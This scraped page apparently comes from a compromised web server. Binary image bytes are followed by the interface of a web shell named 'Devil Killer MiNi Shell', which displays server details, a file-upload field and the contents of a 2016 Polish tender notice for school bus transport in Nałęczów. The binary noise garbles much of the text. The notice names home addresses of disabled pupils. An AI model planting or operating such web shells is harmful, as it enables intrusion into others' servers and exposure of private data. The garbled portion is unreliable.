JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161213/365538-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://umnaleczow.bip.lubelske.pl' target='_blank'>http://umnaleczow.bip.lubelske.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 365538 - 2016
              z dnia 2016-12-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Nałęczów: Dowożenie i odwożenie dzieci i uczniów zamieszkałych na terenie Gminy Nałęczów do placówek oświatowych w roku szkolnym 2016/17 i 2017/18.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zakład Obsługi Placówek Oświatowych w Nałęczowie, krajowy numer identyfikacyjny
              43115596700000, ul.
              ul. Spółdzielcza 
              17,
              24150  
              Nałęczów, woj.
              lubelskie, państwo
              Polska, tel.
              81 50 14 603, e-mail
              zopo.naleczow@interia.pl, faks
              81 50 14 603.
              <br />
              Adres strony internetowej (URL): umnaleczow.bip.lubelskie.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka samorządowa - Zakład Obsługi Placówek Oświatowych w Nałęczowie</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />umnaleczow.bip.lubelskie.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />umnaleczow.bip.lubelske.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w Zakładzie Obsługi Placówek Oświatowych w Nałęczowie<br />
                Adres:
                <br />ul. Spółdzielcza 17, 24-150 Nałęczów</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dowożenie i odwożenie dzieci i uczniów zamieszkałych na terenie Gminy Nałęczów do placówek oświatowych w roku szkolnym 2016/17 i 2017/18.<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dowożenie i odwożenie dzieci i uczniów zamieszkałych na terenie Gminy Nałęczów do placówek oświatowych 
w okresie od 01.01.2017r. do 30.06.2018r. taborem wykonawców zgodnie z kalendarzem roku szkolnego 2016/2017 oraz 2017/2018, codziennie za wyjątkiem dni ustawowo wolnych od zajęć (ferii i dni świątecznych) pojazdami przystosowanymi do przewozu uczniów i dzieci. 
Zamówienie obejmuje trzy części:
Każdy Wykonawca może złożyć ofertę na dowolną liczbę części zamówienia;
Część I  dowóz uczniów i dzieci do i ze Szkoły Podstawowej 
w Nałęczowie i Gimnazjum w Nałęczowie oraz dzieci do i z Przedszkola w Nałęczowie, zamieszkałych w kol. Bochotnica  przed i za lasem, Antopolu oraz w Cynkowie wg niżej opisanej trasy dowozu i odwozu:
Dowóz  rano jeden kurs: 
ok. 7.14 odjazd z uczniami z Kol. Bochotnicy za lasem w pobliżu skrzyżowania drogi przez
              wieś z drogą dojazdową do wsi,
ok. 7.16 odjazd z Kol. Bochotnicy przed lasem,
ok. 7.22 odjazd z przystanku na drodze wiejskiej w Sadurkach (przy przepompowni),
ok. 7.23 odjazd z przystanku w Antopolu
ok. 7.30 odjazd z Cynkowa w pobliżu skrzyżowania drogi przez wieś z drogą na tzw. Mazurów a następnie z przystanków pośrednich w Cynkowie w pobliżu tablicy ogłoszeń, 
w Cynkowie przed mostem na rzece Bochotniczanka, z ul. Cynkowskiej  około 30 m 
od skrzyżowania z ulicą Bochotnica,
ok. 7.40 przyjazd do Szkoły Podstawowej w Nałęczowie i do Przedszkola  przystanek 
na ulicy E. Szelburg Zarembiny,
ok. 7.50 przyjazd do Gimnazjum Publicznego w Nałęczowie przy ul. Spółdzielczej 17.

Odwóz po południu  jeden kurs:
14.20 odjazd z uczniami i opiekunem z Gimnazjum Publicznego w Nałęczowie przy 
ul. Spółdzielczej 17,
ok. 14.30 odjazd ze Szkoły Podstawowej w Nałęczowie i z Przedszkola przystanek                 na ul. E. Szelburg  Zarembiny,
ok. 14.40 przyjazd do Cynkowa w pobliżu skrzyżowania drogi przez wieś  z drogą na tzw. Mazurów z uwzględnieniem przystanków jak przy trasie porannej,
ok. 14.47 przyjazd na przystanek do Antopola,
ok. 14.49 przyjazd na przystanek na drodze wiejskiej w Sadurkach (przy przepompowni)
ok. 14.55 przyjazd do Kol. Bochotnicy za lasem,

      Liczba dni dowozu i odwozu:
W okresie: styczeń  czerwiec 2017r. 	- 102 dni.
		 wrzesień  grudzień 2017r.	-  79 dni	
		 styczeń  czerwiec 2018r.	- 102 dni	
		 Razem 			- 283 dni
Długość jednej trasy dowozu  ok. 17 km.
Długość jednej trasy odwozu  ok. 17 km.
Długość trasy dowozu i odwozu w jednym dniu  ok. 34 km. 
Liczba dowożonych dzieci i uczniów - nie większa niż liczba dopuszczalnych osób 
w autobusie z 50 miejscami siedzącymi oprócz kierowcy. 
Liczba dni dowozu i odwozu,  miejsc przystanków oraz godzin odjazdu 
z poszczególnych przystanków może ulec nieznacznej zmianie w zależności od organizacji roku szkolnego, nieprzewidzianych przerw w nauce i uroczystości szkolnych.
Wykonawca zabezpiecza także opiekuna podczas dowozu i odwozu.

Część II  dowóz uczniów do i ze Szkoły Podstawowej w Piotrowicach zamieszkałych w Ludwinowie, Czesławicach oraz w Piotrowicach przed torami wg niżej opisanej trasy dowozu i odwozu i liczby dni dowozu 
i odwozu:
Dowóz rano jeden kurs: 
	7.10 - wyjazd z opiekunem z pod budynku Szkoły Podstawowej w Piotrowicach 
w kierunku Ludwinowa i Czesławic,
	ok. 7.19 - odjazd z przystanku Nr 1 w Czesławicach naprzeciw nr 135, 
	ok. 7.22 - odjazd z przystanku naprzeciw domu Nr 93, 
	ok. 7.25  -odjazd z przystanku Nr 5 w Czesławicach (przy skrzyżowaniu dróg Nałęczów  Czesławice z drogą do Sadurek,
	ok. 7.28  odjazd z przystanku Nr 7 w Ludwinowie naprzeciw domu Nr 17,
	ok. 7.35  przyjazd do Szkoły Podstawowej w Piotrowicach,
	ok. 7.40  wyjazd z pod budynku Szkoły Podstawowej w Piotrowicach w kierunku wsi Piotrowice przed torami kolejowymi,
	ok. 7.45  odjazd z przystanku koło P. Zasady,
	ok. 7.48  odjazd z przystanku koło krzyża przy skrzyżowaniu z drogą polną, 
	ok. 7.50 - odjazd z przystanku przed skrzyżowaniem z drogą na Markuszów,
	ok. 7.55  przyjazd do Szkoły Podstawowej w Piotrowicach.

Odwóz po południu  jeden kurs
	  14.25 - odjazd z uczniami i opiekunem z pod budynku Szkoły Podstawowej 
              w Piotrowicach w kierunku wsi Piotrowice przed torami kolejowymi,
	14.30  przyjazd na przystanek przed skrzyżowaniem z drogą na Markuszów,
	14.32  przyjazd na przystanek koło krzyża przy skrzyżowaniu z drogą polną,
	14.35.  przyjazd na przystanek koło P. Zasady,
	14.40  przyjazd pod budynek Szkoły Podstawowej w Piotrowicach i odjazd 
             z uczniami i opiekunem  w kierunku Ludwinowa i Czesławic,
	ok. 14.47  przyjazd na przystanek Nr 7 w Ludwinowie Nr 17,
	ok. 14.50 - przyjazd na przystanek Nr 5 w Czesławicach przy skrzyżowaniu dróg      
                  Nałęczów  Czesławice z drogą do Sadurek,
	ok. 14.53  przyjazd na przystanek naprzeciw domu Nr 93, 
	ok. 14.56  przyjazd na przystanek Nr 1 w Czesławicach naprzeciw domu Nr 135  

Liczba dni dowozu i odwozu:
W okresie:  : styczeń  czerwiec 2017r.		- 102 dni
		    wrzesień  grudzień 2017r.	-  79 dni			
		    styczeń  czerwiec 2018r. 		- 102 dni
	    Razem				- 283 dni
Długość jednej trasy dowozu  ok. 20 km.
Długość jednej trasy odwozu  ok. 20 km.
Długość trasy dowozu i odwozu w jednym dniu  ok. 40 km. 
Liczba dowożonych uczniów nie większa niż liczba dopuszczalnych osób w Busie 
z liczbą miejsc niemniejszą  niż 19 oprócz kierowcy. 
Liczba dni dowozu i odwozu, tras dowozu,  miejsc przystanków oraz godzin odjazdu 
z poszczególnych przystanków może ulec nieznacznej zmianie w zależności od organizacji roku szkolnego, nieprzewidzianych przerw w nauce i uroczystości szkolnych oraz warunków atmosferycznych.
Wykonawca zabezpiecza także opiekuna podczas dowozu i odwozu.


Część III- dowóz i odwóz niepełnosprawnych uczniów z miejsca zamieszkania do szkoły/przedszkola w Lublinie tj. 
	jednego ucznia zam. w Nałęczowie, ul. Charz Nr 21 do Specjalnego Ośrodka Szkolno-Wychowawczego Nr 2, ul. Głuska 5 w Lublinie (rozpoczęcie zajęć o godz. 800, zakończenie zajęć 1400  1500),
	jednej uczennicy zam.  w Czesławicach Nr 59 do Specjalnego Ośrodka Szkolno - Wychowawczego Nr 2, ul. Głuska 5 w Lublinie,
(rozpoczęcie zajęć codziennie o godz. 800, zakończenie zajęć 
o godz. 1200  w  poniedziałki, wtorki i czwartki dziecko ze szkoły odbierane będzie we własnym   zakresie przez matkę),
	jednego dziecka zam. w Czesławicach Nr 59 do Przedszkola  Integracyjnego Nr 39, ul. Balladyny 14 w Lublinie,  
(rozpoczęcie zajęć codziennie o godz. 800, zakończenie zajęć codziennie o godz. 1230),
Godziny zakończenia zajęć mogą ulec nieznacznej zmianie. Wg życzenia rodziców, w niektóre dni dzieci mogą być odbierane i odwożone przez rodziców.
Wykonawca zabezpiecza także opiekuna podczas dowozu i odwozu, którego obowiązkiem jest oprócz opieki podczas transportu pomoc każdemu uczniowi przy wsiadaniu i wysiadaniu z samochodu, doprowadzenie każdego ucznia do szkoły/przedszkola, pomoc w przebraniu/ubraniu w szatni i doprowadzenie do odpowiedniej uzgodnionej z przedstawicielem szkoły/przedszkola sali, a po zajęciach odbiór z sali, pomoc przy przebraniu w szatni i doprowadzenie do samochodu, a po przyjeździe do miejsca zamieszkania dziecka doprowadzenie dziecka do domu.
Szczegółowe godziny odbioru dzieci z miejsca zamieszkania i ze szkoły/przedszkola Przewoźnik tak ustali w porozumieniu z rodzicami aby można było je odebrać 
w czasie optymalnym dla wszystkich dzieci.

<br /><br /><b>II.5) Główny kod CPV: </b>60100000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/06/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki art. 22 ust. 1 ustawy Prawo zamówień publicznych, dotyczące:
1.	posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Warunkiem udziału w postępowaniu jest posiadanie licencji na wykonywanie krajowego transportu drogowego osób w zakresie przewozu osób autobusem/busem na terenie objętym przedmiotem zamówienia. Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) posiadanie uprawnień, o których mowa powyżej, jest wymagane od każdego 
z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w takim zakresie, w jakim będą oni wykonywać usługę.
Potwierdzenie spełniania tego warunku zamawiający dokona na podstawie oświadczenia wymienionego w pkt. VI ppkt. 1.1 SIWZ oraz dokumentów wymienionych w pkt. VI ppkt. 1.2 SIWZ.
2.	posiadania wiedzy i doświadczenia:
Warunkiem udziału w postępowaniu jest wykonanie w sposób należyty 
w okresie ostatnich 3 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej jednej podobnej usługi transportowej (u jednego Zamawiającego w zakresie przewozu osób autobusem/busem trwającej przez nieprzerwany okres co najmniej 4 miesięcy). 
Potwierdzenie spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt. VI, ppkt. 1.1 SIWZ oraz dokumentów wymienionych w pkt. VI ppkt. 1.3 SIWZ.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w zakresie spełniania warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt. VI ppkt. 1.1 SIWZ.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt. VI. 1 SIWZ, metodą spełnia/nie spełnia.
Warunki udziału, o których mowa a art. 22, ust.1 ustawy oraz opis sposobu dokonywania oceny ich spełniania mają na celu zweryfikowanie zdolności Wykonawcy do należytego wykonania udzielonego zamówienia.
Uwaga:
W postępowaniu ma zastosowanie art. 26, ust. 2b i2e.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia;
Warunkiem udziału w postępowaniu jest:
a)	Dysponowanie m.in. dwoma kierowcami, którzy będą uczestniczyć w wykonywaniu zamówienia, posiadającymi stosowne kwalifikacje zawodowe  prawo jazdy uprawniające do przewozu osób autobusami/busami i doświadczenie  min. 2 lata na stanowisku kierowcy.
Potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt. VI ppkt. 1.1 SIWZ oraz dokumentów wymienionych w pkt. VI ppkt. 1.5 i 1.6 SIWZ. 
b)	Dysponowanie min. 2 osobami odpowiedzialnymi za sprawowanie opieki nad przewożonymi uczniami posiadającymi umiejętności udzielenia pierwszej pomocy medycznej
Wykonawca w każdym z kursów zapewni jednego opiekuna, który: 
	Zapewni pomoc w zakresie zajmowania miejsca 
w pojeździe i w czasie jego opuszczania, 
	Zapewni dzieciom i uczniom opiekę podczas podróży, 
	W razie potrzeby udzieli pierwszej pomocy medycznej.
Potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt. VI ppkt. 1.1 SIWZ.
c)	Dysponowania pojazdami do realizacji przedmiotu zamówienia tj. dysponowanie minimum;
	2 autobusami o liczbie miejsc siedzących w każdym autobusie  min. 50 (główny i zapasowy) - dla części zamówienia Nr I,
	2 busami o liczbie miejsc siedzących w każdym busie  min. 19 (główny i zapasowy) - dla części zamówienia Nr II,
	2 busami przystosowanymi do przewozu osób niepełnosprawnych (główny i zapasowy) - dla części zamówienia Nr III.
W przypadku awarii pojazdu przewożącego dzieci/uczniów lub      
innej nieprzewidzianej sytuacji uniemożliwiającej wykonanie   
przewozu, Wykonawca ma obowiązek bezwłocznie zapewnić na   
własny koszt i ryzyko transport zastępczy w czasie nie dłuższym niż 
30 minut oraz telefonicznie powiadomić Zamawiającego. 
Potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt. VI ppkt. 1.1 SIWZ oraz załączonych kserokopii dowodów rejestracyjnych pojazdów przewidzianych do realizacji odpowiedniej części zamówienia.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie o braku podstaw do wykluczenia z postępowania.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
